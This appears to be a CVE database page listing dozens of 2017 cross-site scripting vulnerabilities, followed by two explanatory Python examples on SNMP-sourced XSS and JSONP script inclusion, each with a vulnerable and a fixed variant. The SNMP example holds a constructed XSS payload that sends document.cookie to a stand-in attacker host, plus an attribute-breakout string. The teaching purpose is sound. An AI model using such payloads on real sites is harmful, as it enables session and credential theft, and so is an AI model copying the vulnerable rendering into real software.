Total: 13741 CVE
| CVE | Vendors | Products | Updated | CVSS v2 | CVSS v3 |
|---|---|---|---|---|---|
| CVE-2017-8102 | 1 S9y | 1 Serendipity | 2017-04-28 | 3.5 LOW | 5.4 MEDIUM |
| Stored XSS in Serendipity v2.1-rc1 allows an attacker to steal an admin's cookie and other information by composing a new entry as an editor user. This is related to lack of the serendipity_event_xsstrust plugin and a set_config error in that plugin. | |||||
| CVE-2017-7944 | 1 Xoops | 1 Xoops | 2017-04-27 | 4.3 MEDIUM | 6.1 MEDIUM |
| XOOPS Core 2.5.8.1 has XSS due to unescaped HTML output of an Install DB failure error message in page_dbsettings.php. | |||||
| CVE-2017-8103 | 1 Mybb | 1 Mybb | 2017-04-27 | 4.3 MEDIUM | 6.1 MEDIUM |
| In MyBB before 1.8.11, the Email MyCode component allows XSS, as demonstrated by an onmouseover event. | |||||
| CVE-2017-7992 | 1 Heartland Payment Systems | 1 Heartland-php | 2017-04-27 | 4.3 MEDIUM | 6.1 MEDIUM |
| Heartland Payment Systems Payment Gateway PHP SDK hps/heartland-php v2.8.17 is vulnerable to a reflected XSS in examples/consumer-authentication/cruise.php via the URI, as demonstrated by the cavv parameter. | |||||
| CVE-2016-9980 | 1 Ibm | 1 Curam Social Program Management | 2017-04-27 | 3.5 LOW | 5.4 MEDIUM |
| IBM Curam Social Program Management 5.2, 6.0, and 7.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 120256. | |||||
| CVE-2016-9979 | 1 Ibm | 1 Curam Social Program Management | 2017-04-27 | 3.5 LOW | 5.4 MEDIUM |
| IBM Curam Social Program Management 5.2, 6.0, and 7.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 120255. | |||||
| CVE-2017-8052 | 1 Craftcms | 1 Craft Cms | 2017-04-26 | 4.3 MEDIUM | 6.1 MEDIUM |
| Craft CMS before 2.6.2974 allows XSS attacks. | |||||
| CVE-2017-5183 | 1 Netiq | 1 Access Manager | 2017-04-26 | 4.3 MEDIUM | 6.1 MEDIUM |
| NetIQ Access Manager 4.2.2 and 4.3.x before 4.3.1+, when configured as an Identity Server, has XSS in the AssertionConsumerServiceURL field of a signed AuthnRequest in a samlp:AuthnRequest document. | |||||
| CVE-2016-4847 | 1 Ossec | 1 Web Ui | 2017-04-25 | 4.3 MEDIUM | 6.1 MEDIUM |
| Cross-site scripting (XSS) vulnerability in site/search.php in OSSEC Web UI before 0.9 allows remote attackers to inject arbitrary web script or HTML by leveraging an unanchored regex. | |||||
| CVE-2016-4849 | 1 Geeklog Project | 1 Geeklog | 2017-04-25 | 4.3 MEDIUM | 6.1 MEDIUM |
| Multiple cross-site scripting (XSS) vulnerabilities in Geeklog IVYWE edition 2.1.1 allow remote attackers to inject arbitrary web script or HTML by leveraging use of the COM_getCurrentURL function in (1) public_html/layout/default/header.thtml, (2) public_html/layout/bento/header.thtml, (3) public_html/layout/fotos/header.thtml, or (4) public_html/layout/default/article/article.thtml. | |||||
| CVE-2016-6347 | 1 Redhat | 1 Resteasy | 2017-04-25 | 4.3 MEDIUM | 6.1 MEDIUM |
| Cross-site scripting (XSS) vulnerability in the default exception handler in RESTEasy allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. | |||||
| CVE-2017-7891 | 1 Sourcebans-pp Project | 1 Sourcebans-pp | 2017-04-25 | 4.3 MEDIUM | 6.1 MEDIUM |
| sourcebans-pp (SourceBans++) 1.5.4.7 has XSS in admin.comms.php via the rebanid parameter. | |||||
| CVE-2016-1217 | 1 Cybozu | 1 Garoon | 2017-04-25 | 4.3 MEDIUM | 6.1 MEDIUM |
| Cross-site scripting (XSS) vulnerability in the "Check available times" function in Cybozu Garoon before 4.2.2. | |||||
| CVE-2016-1214 | 1 Cybozu | 1 Garoon | 2017-04-25 | 4.3 MEDIUM | 6.1 MEDIUM |
| Cross-site scripting (XSS) vulnerability in the "Response request" function in Cybozu Garoon before 4.2.2. | |||||
| CVE-2016-1215 | 1 Cybozu | 1 Garoon | 2017-04-25 | 4.3 MEDIUM | 6.1 MEDIUM |
| Cross-site scripting (XSS) vulnerability in the "User details" function in Cybozu Garoon before 4.2.2. | |||||
| CVE-2016-1216 | 1 Cybozu | 1 Garoon | 2017-04-25 | 4.3 MEDIUM | 6.1 MEDIUM |
| Cross-site scripting (XSS) vulnerability in the "New appointment" function in Cybozu Garoon before 4.2.2. | |||||
| CVE-2017-7896 | 1 Trendmicro | 1 Interscan Messaging Security Virtual Appliance | 2017-04-25 | 4.3 MEDIUM | 6.1 MEDIUM |
| Trend Micro InterScan Messaging Security Virtual Appliance (IMSVA) 9.1 before CP 1644 has XSS. | |||||
| CVE-2017-7871 | 1 Tdm Project | 1 Tdm | 2017-04-25 | 4.3 MEDIUM | 6.1 MEDIUM |
| trollepierre/tdm before 2017-04-13 is vulnerable to a reflected XSS in tdm-master/webhook.php (challenge parameter). | |||||
| CVE-2015-8256 | 1 Axis | 11 Cannon Network Camera, Explosion-protected Camera, Fixed Box Camera and 8 more | 2017-04-25 | 4.3 MEDIUM | 6.1 MEDIUM |
| Multiple cross-site scripting (XSS) vulnerabilities in Axis network cameras. | |||||
| CVE-2017-1160 | 1 Ibm | 1 Financial Transaction Manager | 2017-04-25 | 3.5 LOW | 5.4 MEDIUM |
| IBM Financial Transaction Manager for ACH Services for Multi-Platform 3.0.0.x is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 122892. | |||||
| CVE-2016-4875 | 3 Assist Project, Databox Project, Userbox Project | 3 Assist Plugin, Databox Plugin, Userbox Plugin | 2017-04-21 | 4.3 MEDIUM | 6.1 MEDIUM |
| Multiple cross-site scripting (XSS) vulnerabilities in the IVYWE (1) Assist plugin before 1.1.2.test20160906, (2) dataBox plugin before 0.0.0.20160906, and (3) userBox plugin before 0.0.0.20160906 for Geeklog allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. | |||||
| CVE-2016-3038 | 1 Ibm | 1 Cognos Business Intelligence | 2017-04-21 | 3.5 LOW | 5.4 MEDIUM |
| IBM Cognos TM1 10.1 and 10.2 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 114614. | |||||
| CVE-2017-0195 | 1 Microsoft | 5 Excel Web App, Office Online Server, Office Web Apps and 2 more | 2017-04-20 | 3.5 LOW | 5.4 MEDIUM |
| Microsoft Excel Services on Microsoft SharePoint Server 2010 SP1 and SP2, Microsoft Excel Web Apps 2010 SP2, Microsoft Office Web Apps 2010 SP2, Microsoft Office Web Apps Server 2013 SP1 and Office Online Server allows remote attackers to perform cross-site scripting and run script with local user privileges via a crafted request, aka "Microsoft Office XSS Elevation of Privilege Vulnerability." | |||||
| CVE-2016-8927 | 1 Ibm | 1 Tivoli Application Dependency Discovery Manager | 2017-04-20 | 3.5 LOW | 5.4 MEDIUM |
| IBM Tivoli Application Dependency Discovery Manager 7.2.2 and 7.3 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 118540. | |||||
| CVE-2014-3887 | 1 Iodata | 2 Rockdisk, Rockdisk Firmware | 2017-04-20 | 3.5 LOW | 5.4 MEDIUM |
| Cross-site scripting (XSS) vulnerability in I-O DATA DEVICE RockDisk with firmware before 1.05e1-2.0.5 allows remote authenticated users to inject arbitrary web script or HTML via unspecified vectors. NOTE: This vulnerability exists because of an incomplete fix for CVE-2013-4713. | |||||
| CVE-2017-7626 | 1 Smart Related Articles Project | 1 Smart Related Articles | 2017-04-20 | 4.3 MEDIUM | 6.1 MEDIUM |
| The "Smart related articles" extension 1.1 for Joomla! has XSS in dialog.php via the n_art and type GET parameters. | |||||
| CVE-2015-7562 | 1 Teampass | 1 Teampass | 2017-04-20 | 4.3 MEDIUM | 6.1 MEDIUM |
| Multiple cross-site scripting (XSS) vulnerabilities in TeamPass 2.1.24 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) label value of an item or (2) name of a role. | |||||
| CVE-2016-8719 | 1 Moxa | 2 Awk-3131a, Awk-3131a Firmware | 2017-04-20 | 4.3 MEDIUM | 6.1 MEDIUM |
| An exploitable reflected cross-site scripting vulnerability exists in the web application functionality of the Moxa AWK-3131A Wireless Access Point running firmware 1.1. Specially crafted input in multiple parameters can cause malicious scripts to be executed in a victim's browser. | |||||
| CVE-2016-1179 | 1 Appleple | 1 A-blog Cms | 2017-04-20 | 4.3 MEDIUM | 6.1 MEDIUM |
| Cross-site scripting (XSS) vulnerability in the standard template of the comment functionality in appleple a-blog cms 2.6.0.1 and earlier allows remote attackers to inject arbitrary web script or HTML. | |||||
| CVE-2016-4897 | 1 Webmin | 1 Usermin | 2017-04-19 | 4.3 MEDIUM | 6.1 MEDIUM |
| Multiple cross-site scripting (XSS) vulnerabilities in (1) filter/save_forward.cgi, (2) filter/save.cgi, (3) /man/search.cgi in Usermin before 1.690. | |||||
| CVE-2016-2104 | 1 Redhat | 1 Satellite | 2017-04-19 | 4.3 MEDIUM | 6.1 MEDIUM |
| Multiple cross-site scripting (XSS) vulnerabilities in Red Hat Satellite 5 allow remote attackers to inject arbitrary web script or HTML via (1) the label parameter to admin/BunchDetail.do; (2) the package_name, (3) search_subscribed_channels, or (4) channel_filter parameter to software/packages/NameOverview.do; or unspecified vectors related to (5) <input:hidden> or (6) <bean:message> tags. | |||||
| CVE-2016-6348 | 1 Redhat | 1 Resteasy | 2017-04-19 | 4.3 MEDIUM | 6.1 MEDIUM |
| JacksonJsonpInterceptor in RESTEasy might allow remote attackers to conduct a cross-site script inclusion (XSSI) attack. | |||||
| CVE-2017-3125 | 1 Fortinet | 1 Fortimail | 2017-04-18 | 4.3 MEDIUM | 6.1 MEDIUM |
| An unauthenticated XSS vulnerability in FortiMail 5.0.0 - 5.2.9 and 5.3.0 - 5.3.8 could allow an attacker to execute arbitrary scripts in the security context of the browser of a victim logged in to FortiMail, assuming the victim is social-engineered into clicking a URL crafted by the attacker. | |||||
| CVE-2017-7621 | 1 Auromeera | 1 Emli | 2017-04-17 | 4.3 MEDIUM | 6.1 MEDIUM |
| Cross-site scripting vulnerability in core-eMLi in AuroMeera Technometrix Pvt. Ltd. eMLi V1.0 allows an attacker to send malicious code, generally in the form of a browser-side script, to a different end user via the page parameter to code/student_portal/home.php. The affected versions are eMLi School Management 1.0, eMLi College Campus Management 1.0, and eMLi University Management 1.0. | |||||
| CVE-2016-5055 | 1 Osram | 1 Lightify Pro | 2017-04-14 | 4.3 MEDIUM | 6.1 MEDIUM |
| OSRAM SYLVANIA Osram Lightify Pro before 2016-07-26 has XSS in the username field and Wireless Client Mode configuration page. | |||||
| CVE-2016-5642 | 1 Opmantek | 1 Network Management Information System | 2017-04-14 | 3.5 LOW | 5.4 MEDIUM |
| Opmantek NMIS before 8.5.12G has XSS via SNMP. | |||||
| CVE-2016-5077 | 1 Netikus | 1 Eventsentry | 2017-04-14 | 4.3 MEDIUM | 6.1 MEDIUM |
| Netikus EventSentry before 3.2.1.44 has XSS via SNMP. | |||||
| CVE-2015-6021 | 1 Spiceworks | 1 Desktop | 2017-04-14 | 4.3 MEDIUM | 6.1 MEDIUM |
| Spiceworks Desktop before 2015-12-01 has XSS via an SNMP response. | |||||
| CVE-2015-2883 | 1 Philips | 1 In.Sight B120/37 | 2017-04-14 | 3.5 LOW | 5.4 MEDIUM |
| Philips In.Sight B120/37 has XSS, related to the Weaved cloud web service, as demonstrated by the name parameter to deviceSettings.php or shareDevice.php. | |||||
| CVE-2015-7275 | 1 Dell | 4 Integrated Remote Access Controller 6, Integrated Remote Access Controller 7, Integrated Remote Access Controller 8 and 1 more | 2017-04-14 | 4.3 MEDIUM | 6.1 MEDIUM |
| Dell Integrated Remote Access Controller (iDRAC) 6 before 2.85 and 7/8 before 2.30.30.30 has XSS. | |||||
| CVE-2016-5075 | 1 Cloudviewnms | 1 Cloudview Nms | 2017-04-14 | 4.3 MEDIUM | 6.1 MEDIUM |
| CloudView NMS before 2.10a has XSS via a TELNET login. | |||||
| CVE-2016-5073 | 1 Cloudviewnms | 1 Cloudview Nms | 2017-04-14 | 4.3 MEDIUM | 6.1 MEDIUM |
| CloudView NMS before 2.10a has XSS via SNMP. | |||||
| CVE-2015-6035 | 1 Opsview | 1 Opsview | 2017-04-13 | 4.3 MEDIUM | 6.1 MEDIUM |
| Opsview before 2015-11-06 has XSS via SNMP. | |||||
| CVE-2017-7591 | 1 Openidm Project | 1 Openidm | 2017-04-13 | 4.3 MEDIUM | 6.1 MEDIUM |
| OpenIDM through 4.0.0 and 4.5.0 is vulnerable to reflected cross-site scripting (XSS) attacks within the Admin UI, as demonstrated by the _sortKeys parameter to the authzRoles script under managed/user/. | |||||
| CVE-2017-7579 | 1 Phpmyfaq | 1 Phpmyfaq | 2017-04-12 | 4.3 MEDIUM | 6.1 MEDIUM |
| inc/PMF/Faq.php in phpMyFAQ before 2.9.7 has XSS in the question field. | |||||
| CVE-2015-4673 | 1 Clip-bucket | 1 Clipbucket | 2017-04-12 | 3.5 LOW | 5.4 MEDIUM |
| Multiple cross-site scripting (XSS) vulnerabilities in ClipBucket 2.7.0.5 allow remote authenticated users to inject arbitrary web script or HTML via (1) the collection_description parameter to upload/manage_collections.php in an add_new action or the (2) photo_description, (3) photo_tags, or (4) photo_title parameter to upload/actions/photo_uploader.php. | |||||
| CVE-2016-1000307 | 1 Clip-bucket | 1 Clipbucket | 2017-04-12 | 4.3 MEDIUM | 6.1 MEDIUM |
| Multiple cross-site scripting (XSS) vulnerabilities in ClipBucket v2.8.1 and probably prior allow remote attackers to inject arbitrary web script or HTML via (1) the profile_desc, about_me, schools, occupation, companies, hobbies, fav_movies, fav_music, or fav_books parameters to the ProfileSettings page; (2) the note parameter to the PersonalNotes section; or (3) the closed_msg, description, or allowed_types parameters to the WebsiteConfigurations section. NOTE: the collection_description vector is already covered by CVE-2015-4673. | |||||
| CVE-2017-6340 | 1 Trendmicro | 1 Interscan Web Security Virtual Appliance | 2017-04-11 | 3.5 LOW | 5.4 MEDIUM |
| Trend Micro InterScan Web Security Virtual Appliance (IWSVA) 6.5 before CP 1746 does not sanitize a rest/commonlog/report/template name field, which allows a 'Reports Only' user to inject malicious JavaScript while creating a new report. Additionally, IWSVA implements incorrect access control that allows any authenticated, remote user (even with low privileges like 'Auditor') to create or modify reports, and consequently take advantage of this XSS vulnerability. The JavaScript is executed when victims visit reports or auditlog pages. | |||||
| CVE-2016-5061 | 1 Aternity | 1 Aternity | 2017-04-10 | 4.3 MEDIUM | 6.1 MEDIUM |
| Multiple cross-site scripting (XSS) vulnerabilities in the web server in Aternity before 9.0.1 allow remote attackers to inject arbitrary web script or HTML via the (1) HTTPAgent, (2) MacAgent, (3) getExternalURL, or (4) retrieveTrustedUrl page. | |||||
| CVE-2017-7215 | 1 Misp Project | 1 Misp | 2017-04-07 | 4.3 MEDIUM | 6.1 MEDIUM |
| Cross site scripting in some view elements in the index filter tool in app/webroot/js/misp2.4.68.js and the organisation landing page in app/View/Organisations/ajax/landingpage.ctp of MISP before 2.4.69 allows remote attackers to inject arbitrary web script or HTML. | |||||
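
Two recurring mechanisms in the table above are worth seeing in code: the OSSEC Web UI entry (CVE-2016-4847) is XSS "by leveraging an unanchored regex", and the monitoring consoles listed with "XSS via SNMP" (Opmantek NMIS, EventSentry, Spiceworks, CloudView NMS, Opsview) render values that arrive from a polled device, not from an HTTP request, so request-side filtering never sees them. The Python below is an added example, not code from any product on this page. The SNMP response, its values and the helper names are constructed for illustration; sysName.0 and sysDescr.0 are the standard MIB-II objects, but the data is made up.

```python
"""Added example: unanchored-regex validation and unencoded rendering of
SNMP-sourced values. Not code from any product listed on this page; the
SNMP response below is constructed."""
import html
import re

# Three ways a product might "validate" a hostname-like sysName.
# 1. Unanchored: re.search succeeds if *any* substring matches, so a
#    payload that contains a single hostname character passes.
HOSTNAME_UNANCHORED = re.compile(r"[A-Za-z0-9.-]+")
# 2. ^...$: better, but in Python '$' also matches just before a trailing
#    newline, so "host\n" is accepted.
HOSTNAME_DOLLAR = re.compile(r"^[A-Za-z0-9.-]+$")
# 3. fullmatch (equivalently \A...\Z) requires the entire string to match.
HOSTNAME = re.compile(r"[A-Za-z0-9.-]{1,253}")


def is_hostname_unanchored(value: str) -> bool:
    return HOSTNAME_UNANCHORED.search(value) is not None


def is_hostname_dollar(value: str) -> bool:
    return HOSTNAME_DOLLAR.match(value) is not None


def is_hostname(value: str) -> bool:
    return HOSTNAME.fullmatch(value) is not None


# Constructed SNMP response as a dict of OID -> value. In a real NMS these
# come from the polled device, so whoever controls the device (or can spoof
# its UDP replies) controls them, and they never pass through the web
# tier's request validation. sysDescr is free text by definition, so it
# cannot be whitelisted the way a hostname can; it must be encoded.
SYS_DESCR, SYS_NAME = "1.3.6.1.2.1.1.1.0", "1.3.6.1.2.1.1.5.0"
CONSTRUCTED_SNMP_RESPONSE = {
    SYS_NAME: 'core-sw1" onmouseover="alert(document.cookie)',
    SYS_DESCR: "<script>new Image().src='//attacker.invalid/?c='+document.cookie</script>",
}


def render_device_row_vulnerable(resp: dict) -> str:
    """Concatenates raw values into the page: sysName breaks out of the
    title attribute, sysDescr lands in a text node as a live <script>."""
    return (f'<tr><td title="{resp[SYS_NAME]}">{resp[SYS_NAME]}</td>'
            f'<td>{resp[SYS_DESCR]}</td></tr>')


def render_device_row(resp: dict) -> str:
    """Encodes at the point of output. quote=True turns " and ' into
    entities, so the same escaped string is safe both inside the quoted
    attribute and in the text node."""
    name = html.escape(resp[SYS_NAME], quote=True)
    descr = html.escape(resp[SYS_DESCR], quote=True)
    return f'<tr><td title="{name}">{name}</td><td>{descr}</td></tr>'


if __name__ == "__main__":
    print(render_device_row_vulnerable(CONSTRUCTED_SNMP_RESPONSE))
    print(render_device_row(CONSTRUCTED_SNMP_RESPONSE))
```

The validator functions show the regex pitfall on its own; the two render functions show that even a correct whitelist on sysName leaves sysDescr, which is arbitrary text, and that contextual output encoding is the control that actually closes the hole.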

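The RESTEasy entry CVE-2016-6348 names cross-site script inclusion (XSSI) rather than XSS. A JSONP interceptor wraps a JSON response in whatever callback the query string names; if it does so for authenticated resources, an attacker's page can load the API URL in a `<script>` tag, the victim's browser attaches its session cookie (cross-site script loads carried cookies by default in 2016-era browsers), and the response executes as script with the private JSON as the callback's argument. The Python below is an added example, not RESTEasy's code; the request model, endpoint paths, cookie name and data are constructed, and the hardened variant assumes the usual fix of keeping JSONP disabled unless an endpoint serving public data opts in.

```python
"""Added example: a JSONP interceptor turned into an XSSI primitive, and
a hardened equivalent. Not RESTEasy code; the request model and data
below are constructed for the example."""
from __future__ import annotations

import json
import re
from dataclasses import dataclass, field


@dataclass
class Request:
    path: str
    query: dict = field(default_factory=dict)
    cookies: dict = field(default_factory=dict)


# Constructed private resource; the session value is made up.
ACCOUNT = {"user": "alice", "email": "alice@example.invalid", "api_key": "constructed-key"}


def handle_account(req: Request) -> dict:
    """Resource method: returns the caller's private record if the session cookie is present."""
    if req.cookies.get("JSESSIONID") != "valid-session":
        raise PermissionError("not logged in")
    return ACCOUNT


def respond_vulnerable(req: Request, data: dict) -> tuple[str, str]:
    """Mimics an interceptor that pads *any* JSON response with a caller-chosen
    callback whenever ?callback= is present. Returns (content_type, body)."""
    cb = req.query.get("callback")
    body = json.dumps(data)
    if cb:
        return "application/javascript", f"{cb}({body});"
    return "application/json", body


def simulate_script_inclusion(body: str) -> dict | None:
    """Stand-in for the browser on an attacker page executing
    <script src="https://api.example/account?callback=leak"></script>.
    The browser sends the victim's cookie with that request and runs the
    response as script, so a function the attacker defined as leak()
    receives the JSON. A bare JSON object is a syntax error as a script,
    which is exactly what the padding defeats. Returns leak()'s argument
    or None when nothing executable came back."""
    m = re.fullmatch(r"leak\((.*)\);", body, re.S)
    return json.loads(m.group(1)) if m else None


# Hardened: JSONP off unless explicitly enabled, only for endpoints that
# serve public data, and only with a callback that is a plain identifier.
CALLBACK_RE = re.compile(r"[A-Za-z_$][A-Za-z0-9_$.]{0,63}")
PUBLIC_JSONP_PATHS = {"/public/status"}  # opt-in list; constructed


def respond_hardened(req: Request, data: dict, jsonp_enabled: bool = False) -> tuple[str, str]:
    cb = req.query.get("callback")
    body = json.dumps(data)
    if cb is None or not jsonp_enabled or req.path not in PUBLIC_JSONP_PATHS:
        return "application/json", body  # callback silently ignored
    if not CALLBACK_RE.fullmatch(cb):
        raise ValueError("callback is not a plain identifier")
    # Leading comment prevents the attacker from choosing the first bytes of
    # the response via the callback name (the Rosetta Flash trick).
    return "application/javascript", f"/**/{cb}({body});"
```

The point of `simulate_script_inclusion` is that the same-origin policy stops a cross-origin page from *reading* JSON, but not from *executing* a response it loaded as a script; once padding makes the body valid JavaScript, the data is delivered to the attacker's function. Ignoring the callback on anything authenticated removes the primitive; validating the callback name only prevents the separate problem of reflecting arbitrary script into the wrapper.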